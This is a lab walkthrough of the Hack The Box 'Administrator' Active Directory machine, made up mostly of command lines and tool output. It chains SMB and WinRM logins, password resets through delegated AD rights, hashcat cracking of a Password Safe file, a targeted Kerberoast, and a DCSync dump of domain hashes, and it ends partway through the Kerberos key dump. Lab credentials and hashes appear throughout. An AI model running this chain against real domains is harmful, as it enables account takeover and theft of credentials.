HTB Administrator done
Administrator
OS:
Windows
Technology:
IP Address:
10.129.49.189
Open ports:
21/tcp open ftp Microsoft ftpd
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-26 06:35:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
64202/tcp open msrpc Microsoft Windows RPC
65243/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65248/tcp open msrpc Microsoft Windows RPC
65259/tcp open msrpc Microsoft Windows RPC
65270/tcp open msrpc Microsoft Windows RPC
Users and pass:
I know the username because it was given on the website: https://app.hackthebox.com/machines/634
L: olivia
P: ichliebedich
---
L: michael
P: Qwerty123
---
L: benjamin
P: Qwerty123
---
Password to backup.psafe3
Password: tekieromucho
---
Logins and passowords inside PasswordSafe
Alexander Smith
U: alexander
P: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
___
Emily Rodriguez
U: emily
P: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
___
Emma Johnson
U: emma
P: WwANQWnmJnGV07WQN8bMS7FMAbjNur
---
Cracking password for user ethan (krb5tgs)
L: ethan
P: limpbizkit
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.49.189_nmap 10.129.49.189 ; cat 10.129.49.189_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 18:34 EST
Nmap scan report for 10.129.49.189
Host is up (0.034s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-26 06:35:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
64202/tcp open msrpc Microsoft Windows RPC
65243/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
65248/tcp open msrpc Microsoft Windows RPC
65259/tcp open msrpc Microsoft Windows RPC
65270/tcp open msrpc Microsoft Windows RPC
SMB
List all share for user olivia
I know the username because it was given on the website: https://app.hackthebox.com/machines/634
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ nxc smb 10.129.49.189 -u 'olivia' -p 'ichliebedich' --shares
SMB 10.129.49.189 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.49.189 445 DC [+] administrator.htb\olivia:ichliebedich
SMB 10.129.49.189 445 DC [*] Enumerated shares
SMB 10.129.49.189 445 DC Share Permissions Remark
SMB 10.129.49.189 445 DC ----- ----------- ------
SMB 10.129.49.189 445 DC ADMIN$ Remote Admin
SMB 10.129.49.189 445 DC C$ Default share
SMB 10.129.49.189 445 DC IPC$ READ Remote IPC
SMB 10.129.49.189 445 DC NETLOGON READ Logon server share
SMB 10.129.49.189 445 DC SYSVOL READ Logon server share
List and download share: SYSVOL -rabbithole
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ smbclient //10.129.49.189/SYSVOL -U 'Olivia%ichliebedich'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Oct 4 15:48:08 2024
.. D 0 Fri Oct 4 15:48:08 2024
administrator.htb Dr 0 Fri Oct 4 15:48:08 2024
5606911 blocks of size 4096. 1257441 blocks available
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \administrator.htb\DfsrPrivate\*
getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2802 as administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.4 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 553 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx (4.0 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 184 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol (1.3 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \administrator.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as administrator.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (7.9 KiloBytes/sec) (average 4.4 KiloBytes/sec)
getting file \administrator.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 4262 as administrator.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (30.8 KiloBytes/sec) (average 7.4 KiloBytes/sec)
smb: \> exit
Login as user: Olivia via evil-winrm
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ evil-winrm -i 10.129.98.156 -u 'olivia' -p 'ichliebedich'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\olivia\Desktop> dir
*Evil-WinRM* PS C:\Users\olivia\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\olivia\Desktop>
Bloodhound
Run bloodhound-python
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ bloodhound-python -d administrator.htb -ns 10.129.98.156 -u olivia -p ichliebedich -c All --zip
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 07S
INFO: Compressing output into 20241127180209_bloodhound.zip
Findings in Bloodhound
User Olivia has "GenericAll" for Michael
She can change password for user Michael
---
*Evil-WinRM* PS C:\Users\olivia\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\olivia\Desktop> net user michael Qwerty123 /domain
The command completed successfully.
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ evil-winrm -i 10.129.98.156 -u 'michael' -p 'Qwerty123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> dir
*Evil-WinRM* PS C:\Users\michael\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\michael\Desktop> dir
*Evil-WinRM* PS C:\Users\michael\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== ============================================
administrator\michael S-1-5-21-1088858960-373806567-254189436-1109
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\michael\Desktop>
User Michael can change password for user Benjamin
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ rpcclient -U michael 10.129.98.156
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'Qwerty123'
rpcclient $> exit
User Benjamin has MemberOf Share Moderators
Download file: Backup.psafe3 from ftp
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ ftp -A 10.129.98.156
Connected to 10.129.98.156.
220 Microsoft FTP Service
Name (10.129.98.156:kali): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> mget Backup.psafe3
mget Backup.psafe3 [anpqy?]? y
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |************************************************************************| 952 24.21 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (22.89 KiB/s)
ftp> exit
221 Goodbye.
Password Safe
Download Password Safe application
Download from this website: [Password Safe](https://sourceforge.net/projects/passwordsafe/)
Run Password Safe
I see we need password to open Backup file
Cracking password for backup.psafe3
Password: tekieromucho
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ hashcat -m5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 2823/5710 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP
ATTENTION! Potfile storage is disabled for this hash mode.
Passwords cracked during this session will NOT be stored to the potfile.
Consider using -o to save cracked passwords.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
Backup.psafe3:tekieromucho
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Wed Nov 27 19:28:26 2024 (1 sec)
Time.Estimated...: Wed Nov 27 19:28:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6145 H/s (2.41ms) @ Accel:512 Loops:32 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#1....: newzealand -> iheartyou
Hardware.Mon.#1..: Util: 50%
Started: Wed Nov 27 19:27:43 2024
Stopped: Wed Nov 27 19:28:29 2024
Open application PasswordSafe
Password: tekieromucho
---
I found 3 records with logins and passwords
Alexander Smith
U: alexander
P: UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
___
Emily Rodriguez
U: emily
P: UXLCI5iETUsIBoFVTj8yQFKoHjXmb
___
Emma Johnson
U: emma
P: WwANQWnmJnGV07WQN8bMS7FMAbjNur
Bloodhound
Find user: emily
User Emily has priv: GenericWrite for user Ethan
Create a SPN
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ sudo ntpdate administrator.htb
2024-11-29 06:29:05.966884 (+0000) +25199.931520 +/- 0.017047 administrator.htb 10.129.63.212 s1 no-leap
CLOCK: time stepped by 25199.931520
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Administrator/targetedKerberoast]
└─$ python3 targetedKerberoast.py -d administrator.htb -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e8b2185e11a032256b697323b2d19149$b41731dd489f6046b53ec22b0b21088c69e2cbe13e96cab10470c13490054195b400942a2d9e84d731990bbdd27e2ac9e8c7febc502e37a24f38195dba7ecc5bfb11b319e415cfd5f9655833153255aea077e43d1fd4d83b4c93d1ef012632ab81ae13a7b24dca9733a3e4849ed71b50f27e10f6c804594b4de27ad5c3d745802f7dfcf44261750e9f2667170e7a35f581d5c7ff3db236e99f2133cdd76806a4fb3fa04b5d36f21d59b5aac7043d1771ab4069a5976e05fcfe439576898dfe07d0cfc4f5406d0cfd083c9eb4aac9d35a2ad659d297f8377d4e1aa9c93dcb784e02237da366156e45ef90148c1884cc348ca7269b441fbf152a7c9eda511125b1b4d5b23d6168b9cc39b43581efb0a593efb75a3dca93c2efd4dcf2a98215ea0fcaf0075370431314b06536b0dfaac394a2ed6c799ffe0ecae1a5be8dfbf8bd20aff4ec09c0396c1dbfb3dae2fa179c5bd5cca04afa3932bea7668bc8526303b2a6aa569190f4e8654faa42a734f364fff534dddb74361f6b05404b30cbfb9ca71a542c90c8e6e6f3d026d1714a219a5dd23c7cbe2c29355cdeb238eaf7eb8279284c135a333bc0fc4f97804032d116d523f9113e464db68c7691952dd0ff1c349d2ba07b6103f50f85dad99d7178db660c607e66bb8e05786376ebcd520b05eab8a7df7768f47c97c8778bdd259e2945f7b9c46bd64dda8e227db1fd014c38263edb419e2161f70dd23bcb7b75691896586433fc069c5f988bf30d8d0861e59c76121a0ee50cf1b172e6ca71eb487c845e5d2b40058b8912a0726141a61f7dfd41141b09e346ff2a1b11904c100ba59fc867ddf33b6f65a010fed20763ded1644e9a6e6ee7b93774470b9e9ffa01a46607a31e827b2650571e930d0d31262347a3d23ea954d74d583ed20c3a0e2dd21544f84d11372657f4e9b97336a9c1017b52540e07165b7c569621398e8fecd176aa3356633fc4972abd9702d85fce5258fc1f1b8ae6628e6468c7ae58ed6ab7f22412f503d2697bab72e0169c089a5fb6eb682534efc02e614fd11a5a8d8fb8c24ac6abfbf746bd915fb3cd9a35533b8ad814f8e3ca4542b509c2505b1d07ce0ed8d4da7bf1a2b45068985838acea21db55f079a0daebae9848f3af8bee76f6176b563f1157266008fbfa25ae415558351355c51f2cf61f409a9f2c02389d62c87a1d9881c51cd7c0de5eb388e7c87baa9d84bd7c58b18362d5f16368a4d8214af9738f0bb94a1f767e3bd0fee61ef12e625b1132c22e78343968e6864c51d3af574f402604e7fc5798785c4166689f60becdac6e6cdb98fec8eb0e4c89fc74f03542d1f10b2508501ef9feeab15a35ae974f064c7cf09d9cd968c3cfa22419037e2bd7a922f63ccc8ca3f956d6f0ba128e2b2cc4b8d64fd4f78c677a7c98cf6fbf90f24d254be4d52f7a001e2c592690074425096d34778b1356d360f6dc74e7e119489c0f354afa4d0f39c19c78e18d4c911115e0bcc40596dc281f928bb40bfb8d9121998f6f89e262640c81aa21
Cracking krb5t hash for user ethan
L: ethan
P: limpbizkit
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ hashcat krb5t.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 2823/5710 MB (1024 MB allocatable), 4MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e8b2185e11a032256b697323b2d19149$b41731dd489f6046b53ec22b0b21088c69e2cbe13e96cab10470c13490054195b400942a2d9e84d731990bbdd27e2ac9e8c7febc502e37a24f38195dba7ecc5bfb11b319e415cfd5f9655833153255aea077e43d1fd4d83b4c93d1ef012632ab81ae13a7b24dca9733a3e4849ed71b50f27e10f6c804594b4de27ad5c3d745802f7dfcf44261750e9f2667170e7a35f581d5c7ff3db236e99f2133cdd76806a4fb3fa04b5d36f21d59b5aac7043d1771ab4069a5976e05fcfe439576898dfe07d0cfc4f5406d0cfd083c9eb4aac9d35a2ad659d297f8377d4e1aa9c93dcb784e02237da366156e45ef90148c1884cc348ca7269b441fbf152a7c9eda511125b1b4d5b23d6168b9cc39b43581efb0a593efb75a3dca93c2efd4dcf2a98215ea0fcaf0075370431314b06536b0dfaac394a2ed6c799ffe0ecae1a5be8dfbf8bd20aff4ec09c0396c1dbfb3dae2fa179c5bd5cca04afa3932bea7668bc8526303b2a6aa569190f4e8654faa42a734f364fff534dddb74361f6b05404b30cbfb9ca71a542c90c8e6e6f3d026d1714a219a5dd23c7cbe2c29355cdeb238eaf7eb8279284c135a333bc0fc4f97804032d116d523f9113e464db68c7691952dd0ff1c349d2ba07b6103f50f85dad99d7178db660c607e66bb8e05786376ebcd520b05eab8a7df7768f47c97c8778bdd259e2945f7b9c46bd64dda8e227db1fd014c38263edb419e2161f70dd23bcb7b75691896586433fc069c5f988bf30d8d0861e59c76121a0ee50cf1b172e6ca71eb487c845e5d2b40058b8912a0726141a61f7dfd41141b09e346ff2a1b11904c100ba59fc867ddf33b6f65a010fed20763ded1644e9a6e6ee7b93774470b9e9ffa01a46607a31e827b2650571e930d0d31262347a3d23ea954d74d583ed20c3a0e2dd21544f84d11372657f4e9b97336a9c1017b52540e07165b7c569621398e8fecd176aa3356633fc4972abd9702d85fce5258fc1f1b8ae6628e6468c7ae58ed6ab7f22412f503d2697bab72e0169c089a5fb6eb682534efc02e614fd11a5a8d8fb8c24ac6abfbf746bd915fb3cd9a35533b8ad814f8e3ca4542b509c2505b1d07ce0ed8d4da7bf1a2b45068985838acea21db55f079a0daebae9848f3af8bee76f6176b563f1157266008fbfa25ae415558351355c51f2cf61f409a9f2c02389d62c87a1d9881c51cd7c0de5eb388e7c87baa9d84bd7c58b18362d5f16368a4d8214af9738f0bb94a1f767e3bd0fee61ef12e625b1132c22e78343968e6864c51d3af574f402604e7fc5798785c4166689f60becdac6e6cdb98fec8eb0e4c89fc74f03542d1f10b2508501ef9feeab15a35ae974f064c7cf09d9cd968c3cfa22419037e2bd7a922f63ccc8ca3f956d6f0ba128e2b2cc4b8d64fd4f78c677a7c98cf6fbf90f24d254be4d52f7a001e2c592690074425096d34778b1356d360f6dc74e7e119489c0f354afa4d0f39c19c78e18d4c911115e0bcc40596dc281f928bb40bfb8d9121998f6f89e262640c81aa21:limpbizkit
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....81aa21
Time.Started.....: Thu Nov 28 23:35:23 2024 (0 secs)
Time.Estimated...: Thu Nov 28 23:35:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 493.1 kH/s (2.53ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344385 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: newzealand -> iheartyou
Hardware.Mon.#1..: Util: 27%
Started: Thu Nov 28 23:35:06 2024
Stopped: Thu Nov 28 23:35:24 2024
Get hash for user: Administrator
We see that ethan has DCSync, he can dump all password for AD
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Administrator]
└─$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py administrator.htb/ethan:[email protected]
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htb\michael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htb\michael:des-cbc-md5:43c2bc231598012a
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htb\benjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
